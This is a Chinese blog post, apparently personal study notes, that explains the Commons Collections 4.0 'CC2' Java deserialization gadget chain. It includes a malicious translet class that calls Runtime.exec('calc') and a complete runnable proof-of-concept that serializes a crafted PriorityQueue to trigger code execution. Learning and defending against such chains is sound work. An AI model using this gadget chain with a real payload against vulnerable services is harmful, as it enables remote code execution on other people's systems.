Java安全学习笔记--反序列化漏洞利用链CC2链

已于 2022-01-19 18:59:04 修改
阅读量1k 收藏 2
点赞数
分类专栏: Java安全 文章标签: java 安全 开发语言 信息安全 网络安全
于 2022-01-18 20:41:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64685672/article/details/122566019
版权

测试环境

jdk1.8(jdk8u71)

apache common cellection 4.0

预备知识简述

Javassist动态字节码编程

字节码技术可以动态改变某个类的结构(添加/删除/修改  新的属性/方法)

关于字节码的框架有javassist,asm,bcel等,javassist相对简单不需要掌握字节码指令相关知识即可使用。

几个关键的类:

ClassPool:ClassPool 类可以控制的类的字节码,例如创建一个类或加载一个类,是CtClass对象集合的容器。一旦CtClass对象被创建,它就会被永远一直记录在ClassPool内。

CtClass: CtClass提供了类的操作,如在类中动态添加新字段、方法和构造函数、以及改变类、父类和接口的方法

CtField:类的属性,通过它可以给类创建新的属性,还可以修改已有的属性的类型,访问修饰符等

CtMethod:表示类中的方法,通过它可以给类创建新的方法,还可以修改返回类型,访问修饰符等, 甚至还可以修改方法体内容代码

CtConstructor:用于访问类的构造,与CtMethod类的作用类似

PriorityQueue类

优先队列,向队列中添加元素时,使得队列保持有序,比如,1,3,2,以这个顺序入队再出队的时候就是1,2,3,这是默认的排序方式,在实例化的时候可以传入一个Comparator

 Queue<Customer> customerPriorityQueue = new PriorityQueue<>(7, idComparator);

idComparators是一个Comporator类可以通过重写compare方法提供自定义的排序方式,很多支持自定义排序方式的函数或类都支持类似的传参,在cc2链中利用的就是TranformingCompatator这个Comporator的子类自带的compare方法

  public static Comparator<Customer> idComparator = new Comparator<Customer>(){
        @Override
        public int compare(Customer c1, Customer c2) {
            return (int) (c1.getId() - c2.getId());
        }
};

通过查看PriorityQueue这个类的readObject源码来看,每次这个类的实例被反序列化都会进行一次排序,所以会触发比较器的compare方法

TemplatesImpl类:

这是一个JDK用于在处理xml文件用到的类,在Java 8u251后不能使用, 具体这个类的说明,以及高版本不能使用的原因可以看P神的这一篇文章。https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html

CC2链是基于 Apache common collection 4.0的因为利用链中的一个类(TransformingComparator)在3.0是没有实现Serializable接口,而且在jdk8u71的时候AnotationInvocationHandler的readObject已经被改写,CC1链在apache common collection 4.0的时候失效

恶意类

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;


public class evilClass extends AbstractTranslet{
    //需要继承AbstractTranslet,因为在defineTransletClasses中会判断是否继承了这个类没有会报错
    public evilClass() {
        super();
        try {
            Runtime.getRuntime().exec("calc");
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    //两种触发方式构造方法和静态代码块
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }}


    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }


}

利用链核心

        //将恶意类转换为字节码
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("com.test.evilClass");
        byte[] bytes = ctClass.toBytecode();

        //通过反射创建TemplatesImpl类实例
        Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Constructor<?> constructor = aClass.getDeclaredConstructor();
        Object templatesImpl = constructor.newInstance();
        //将恶意类的字节码设置给_bytecodes属性
        Field bytecodes = aClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(TemplatesImpl_instance , new byte[][]{bytes});
        //设置属性_name为恶意类名
        Field name = aClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(TemplatesImpl_instance , "evilTemplatesImpl");

        //利用invokerTransformer类的transform方法来触发newTransformer
        InvokerTransformer transformer=new InvokerTransformer("newTransformer",null,null);

CC2利用链核心主要是利用动态字节码编程,将恶意类转为字节码,通过反射的方式将恶意类的字节码赋值给TranslatesImpl类的_bytecodes属性, TranslatesImpl这个类可以将_bytecodes中的字节码转换为类(defineTransletClasses方法)复制给属性_class,并且也可以将_class实例化(newInstance方法),通过利用链依次调用方法最后实例化触发恶意类构造方法或静态类中的恶意代码。

TranslatesImpl类中的getTransletInstance方法同时调用了这两个方法,所以接下来是调用getTransletClasses的地方。

 public synchronized Transformer newTransformer()
        throws TransformerConfigurationException
    {
        TransformerImpl transformer;

        transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
            _indentNumber, _tfactory);
        省略。。。
        return transformer;
    }

还是TranslatesImpl类中的newTransFormer方法调用了getTransletClassed,并且它是一个公有方法所以就可以利用cc1链中的invoketransform类的transform方法来调用他,接下来就是调用了transform的类了。

用到的是TransformingComparator类,并且这个类也实现了serializable接口,这个类中的compare方法调用了transform方法,这里的this.transformer是可控的。

接下来就是利用链中的最后一个类PriorityQueue,这个类重写了readObject(实现了serializable接口),在readObject中调用了compare方法。

readObject方法中具体的调用compare方法的过程

readObject()

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Read in size, and any hidden stuff
    s.defaultReadObject();

    // Read in (and discard) array length
    s.readInt();

    SharedSecrets.getJavaOISAccess().checkArray(s, Object[].class, size);
    queue = new Object[size];

    // Read in all elements.
    for (int i = 0; i < size; i++)
        queue[i] = s.readObject();

    // Elements are guaranteed to be in "proper order", but the
    // spec has never explained what that might be.
    heapify();
}

heapify()可以看出PriorityQueue类使用堆排序对反序列化出的元素排序

siftDown()这里会进入siftDownUsingComparator(),因为comparator会在POC中被赋值

siftDownUsingComparator()

编写POC:

import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.PriorityQueue;

public class CC2Poc {
    public static void main(String[] args) throws NotFoundException, IOException, CannotCompileException, ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchMethodException, NoSuchFieldException {
        //将恶意类转换为字节码
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("com.test.evilClass");
        byte[] bytes = ctClass.toBytecode();

        //反射创建TemplatesImpl
        Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Constructor<?> constructor = aClass.getDeclaredConstructor();
        //TemplatesImpl有无参构造不需传参
        Object templatesImpl = constructor.newInstance();
        //将恶意类的字节码设置给_bytecodes属性
        Field bytecodes = aClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templatesImpl, new byte[][]{bytes});
        //设置属性_name为恶意类名
        Field name = aClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templatesImpl , "evilTemplatesImpl");
        //利用invokerTransformer类的transform方法来触发newTransformer
        InvokerTransformer transformer=new InvokerTransformer("newTransformer",null,null);
        TransformingComparator transformerComparator =new TransformingComparator(transformer);
        //这里添加两个1是因为PriorityQueue有一个属性为size表示队列中的元素个数,相当于在队列中添加两个空间在后面代码中就通过反射将templatesImpl代替这两个1
        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);

        //设置comparator属性
        Field field=queue.getClass().getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(queue,transformerComparator);

        //设置queue属性,至少添加两个元素才会进行比较
        field=queue.getClass().getDeclaredField("queue");
        field.setAccessible(true);
        Object[] objects = new Object[]{templatesImpl , templatesImpl};
        field.set(queue,objects);

        //序列化
        ByteArrayOutputStream byteArrayOutputStream= new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(queue);
        objectOutputStream.close();
        // 反序列化
        ByteArrayInputStream byteArrayInputStream=new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        Object object = objectInputStream.readObject();
    }

}

总感觉优先队列有点熟悉,后来看了源码,优先队列入队的过程其实就是进行堆排序的过程。

m0v0
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java:PriorityQueue详解——从零基础到应用
流楚丶格念的博客
07-17 5100
看了网上的详解,我反是一篇没看懂,都是什么垃圾玩意也发出来,无语,我自己根据这两天的学习总结出来了下面这些干货,我就是这么学会的,大家要是零基础看肯定木问题。
CC2640R2的OAD资料接.txt
05-27
CC2640R2OAD的相关
Java安全研究——反序列化漏洞之CC
weixin_43889136的博客
04-13 3865
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
【Web】Java反序列化CC2——commons-collections4的新之一
最新发布
uuzeray的博客
03-01 506
而siftDownUsingComparator内部会调用构造方法传入的comparator的compare方法,此时我们只要令comparator为TransformingComparator即可完成利用的调用。API 设计:commons-collections4 重新设计了 API,并且引入了一些新的功能和改进,同时也修复了一些旧版本中存在的 bug。安全性增强:commons-collections4 引入了更多的安全性措施,以防止常见的安全漏洞。最后调用了heapify方法。
Java原生反序列化漏洞利用(URLDNS)
m0_55994898的博客
08-03 160
反序列化漏洞指在代码中存在不安全反序列化操作(可控的序列化数据流入了反序列化方法中),在绝大多数编程语言中通常都有序列化/反序列化的功能(例如PHP,Java,Python),在序列化/反序列化的过程中通常会自动调用一些固定的方法,在PHP中序列化/反序列化时会调用对应类中的。
6-java安全——java反序列化漏洞利用
网络安全
07-01 3843
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
告别脚本小子系列丨JAVA安全(6)——反序列化利用(上)
C20220511的博客
06-24 1075
我们通常把反序列化漏洞和反序列化利用分开来看,有反序列化漏洞不一定有反序列化利用(经常用shiro反序列化工具的人一定遇到过一种场景就是找到了key,但是找不到gadget,这也就是在这种场景下没有可利用反序列化利用)。如果我们向某个漏洞提交平台提交一个反序列化漏洞,但是不给反序列化利用,那么平台大概率是不会接受这种漏洞的。...
cc2(小宇特详解)
小宇的web博客
02-19 3758
cc2(小宇特详解) 漏洞环境 jdk8u71 apache commons collection-4.0 与cc1的区别 cc2利用中使用了动态字节码编程来构造poc cc2没有使用反序列化漏洞 cc利用流程 构造一个TestTemplatesImpl恶意类转成字节码,然后通过反射将恶意类的字节码注入到TemplatesImpl对象的_bytecodes属性(构造利用核心代码) 创建一个InvokerTransformer并传递一个newTransformer方法,然后将Invoker
Java安全研究——反序列化漏洞之CC2
weixin_43889136的博客
05-10 1411
0x01
CC2分析
sunyufei_666的博客
08-11 109
所以可以采用CC1方法,在对象实例化的时候不添加comparator对象,添加玩元素后再通过反射传入comparator对象,这样没有comparator对象后,siftUp方法执行后会进入siftUpComparable方法,这里不会调用compare方法,可以避免触发调用计算器。这两个方法都会调用compare方法,只是第一个方法是 key对象进行调用,第二个方法是comparator对象调用。该类是类转换比较器,构造器中存放Transfomer,compare方法中调用了transform。
【组件攻击】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用
further_eye的博客
12-21 4455
近年来禅道漏洞频发,从2018年开始,每年都会爆出比较严重的高危漏洞,通过这些高危漏洞均可对服务器造成一定的影响,甚至可以获取服务器的最高权限。
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
java反序列化漏洞-验证.rar
06-25
java反序列化漏洞-验证jar
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞(漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
“白痴“上帝视角调节反序列化CC2
HBohan的博客
09-28 173
说是白痴上帝视角的原因在于我们拿到了poc,模拟不知道任何细节,去分析这个漏洞的形成原因。也可以说半黑盒状态,主要是锻炼一下分析能力。CC1的分析已经在之前的文章发过了。主要是拿来入门的,现在我们分析一下CC2.这篇文章也是重构,很早之前分析了一次,但是当时水平比现在还低,所以很多地方还不够清楚。现在重新分析一下。需要涉及到以下的知识点 javassist动态编程(主要是字节码修改操作,把他可以看成一个加强版的反射) 本来开始直接跟着poc调的,poc不是特别的友好,很多地方不清楚,那我们还是借助poc逆.
java安全 反序列化(二)
sechelper的博客
12-07 573
java反射,CC6源码分析,LazyMap利用连,ysoserial工具
Javaweb安全——反序列化漏洞-原生利用JDK8u20
weixin_43610673的博客
10-24 1458
回顾一下JDK7u21那个子,主体部分是通过方法去调用。equalsImpl会将this.type 类中的所有方法遍历并执行,通过设置Templates类,则势必会调用到其中的 getOutputProperties()方法,进而触发任意代码执行。从7u25修复了这个利用,AnnotationInvocationHandler 的反序列化逻辑发生了改变,将会判断this.type字段值是否是 Annotation 注解类型,不是则直接抛出异常。
shiro-550反序列化漏洞与shiro-721反序列化漏洞的区别
04-13
这是一个技术问题,Shiro-550漏洞与Shiro-721漏洞都是Apache Shiro框架中的反序列化漏洞,但Shiro-550漏洞主要是由于使用了不安全Java反序列化进行身份验证,而Shiro-721漏洞主要是由于Shiro的rememberMe功能中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值